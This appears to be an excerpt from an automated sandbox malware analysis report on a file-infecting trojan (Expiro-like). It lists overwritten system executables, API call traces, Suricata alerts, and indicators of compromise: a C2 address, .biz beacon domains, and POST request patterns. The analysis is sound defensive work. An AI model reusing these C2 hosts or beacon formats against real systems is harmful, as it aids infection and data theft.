                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 02A47394h7_2_02A47108
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 02A478DCh7_2_02A4767A
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h7_2_02A47E60
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h7_2_02A47E54
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 4x nop then jmp 0592BCBDh17_2_0592BA40

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:55575 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:59396 -> 172.234.222.138:80
                        Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:50357 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:51197 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:54147 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:59751 -> 18.208.156.248:80
                        Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.5:54996 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.5:56257 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.5:56279 -> 1.1.1.1:53
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: 212.162.149.53:2049
                        Queries random domain names (often used to prevent blacklisting and sinkholes)
                        Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                        Source: unknownNetwork traffic detected: DNS query count 87
                        Source: global trafficTCP traffic: 192.168.2.5:49708 -> 212.162.149.53:2049
                        Source: global trafficTCP traffic: 192.168.2.5:49711 -> 51.195.88.199:587
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49706
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49706
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49710
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49710
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:59392
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:59392
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:59491
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:59491
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:59498
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:59498
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:59538
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:59538
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.5:59550
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.5:59550
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.5:59592
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.5:59592
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.5:59599
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.5:59599
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.5:59724
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.5:59724
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.5:59752
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.5:59752
                        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.5:59754
                        Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.5:59754
                        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:59401
                        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:59640
                        Source: global trafficTCP traffic: 192.168.2.5:49711 -> 51.195.88.199:587
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bimwjsl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /hmdy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /vrnakrk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ltaudf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /hadsfcqa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /jsr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /pkljfdj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /qljrltdbsuxud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ioqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /plvfcdbflq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /blqwxioreon HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /vydffyeediqodv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /eybmhvtk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ovtsne HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ebm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /oiarwfji HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /tookpqdumsvuivi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /tqkivcurvenplovb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /dh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /dltqf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /augbqjw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /kqmqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /rkqsyeybt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /wpydads HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /aymirwrcjb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /qntnr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /vfgrjxuhtsfio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /agsuui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
